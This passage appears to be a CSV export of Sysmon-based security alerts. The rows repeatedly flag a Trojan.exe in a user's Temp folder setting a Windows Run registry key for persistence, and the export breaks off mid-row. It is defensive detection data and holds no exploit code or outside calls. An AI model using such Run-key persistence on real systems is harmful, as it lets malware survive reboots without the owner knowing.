HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:58.137735300Z"",""eventRecordID"":""1271"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:58.134\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:58.134"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:10.255",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:57.108 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:57.117023300Z"",""eventRecordID"":""1270"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:57.108\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:57.108"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:09.191",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:56.070 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:56.077078300Z"",""eventRecordID"":""1269"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:56.070\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:56.070"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:08.184",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:55.058 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:55.062253400Z"",""eventRecordID"":""1268"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:55.058\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:55.058"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:06.208",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:54.025 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:54.028072200Z"",""eventRecordID"":""1267"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:54.025\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:54.025"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:06.195",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:53.009 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:53.025707800Z"",""eventRecordID"":""1266"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:53.009\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:53.009"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:05.123",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:51.988 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:51.995450600Z"",""eventRecordID"":""1265"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:51.988\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:51.988"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:04.099",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:50.937 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:50.991776700Z"",""eventRecordID"":""1264"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:50.937\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:50.937"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:03.053",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:49.858 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:49.886878700Z"",""eventRecordID"":""1262"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:49.858\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:49.858"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:02.038",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:48.852 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:48.855394700Z"",""eventRecordID"":""1261"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:48.852\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:48.852"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:01.219",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:47.714 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:47.784436700Z"",""eventRecordID"":""1260"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:47.714\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:47.714"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:59.864",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:46.131 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 